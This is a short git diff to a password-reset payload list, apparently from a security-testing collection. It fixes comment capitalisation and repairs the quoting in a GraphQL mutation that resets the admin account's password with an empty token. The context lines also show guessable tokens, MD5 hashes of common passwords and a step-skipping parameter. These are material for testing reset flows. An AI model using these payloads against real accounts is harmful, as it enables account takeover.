diff --git a/Password-Reset/password-reset-payloads.txt b/Password-Reset/password-reset-payloads.txt index 80cb472..ff40d79 100644 --- a/Password-Reset/password-reset-payloads.txt +++ b/Password-Reset/password-reset-payloads.txt @@ -204,8 +204,8 @@ token_3 1609459202 # MD5 of simple inputs -5f4dcc3b5aa765d61d8327deb882cf99 (md5 of "password") -e10adc3949ba59abbe56e057f20f883e (md5 of "123456") +5f4dcc3b5aa765d61d8327deb882cf99 (MD5 of "password") +e10adc3949ba59abbe56e057f20f883e (MD5 of "123456") # Short alphanumeric (low entropy) aaa @@ -331,7 +331,7 @@ current_step=final # GraphQL mutations {"query":"mutation{resetPassword(email:\"victim@example.com\"){success}}"} -{"query":"mutation{resetPassword(email:\"admin@example.com\",token:\""){success}}"} +{"query":"mutation{resetPassword(email:\"admin@example.com\",token:\"\"){success}}"} # REST API variations PUT /api/v1/users/1/password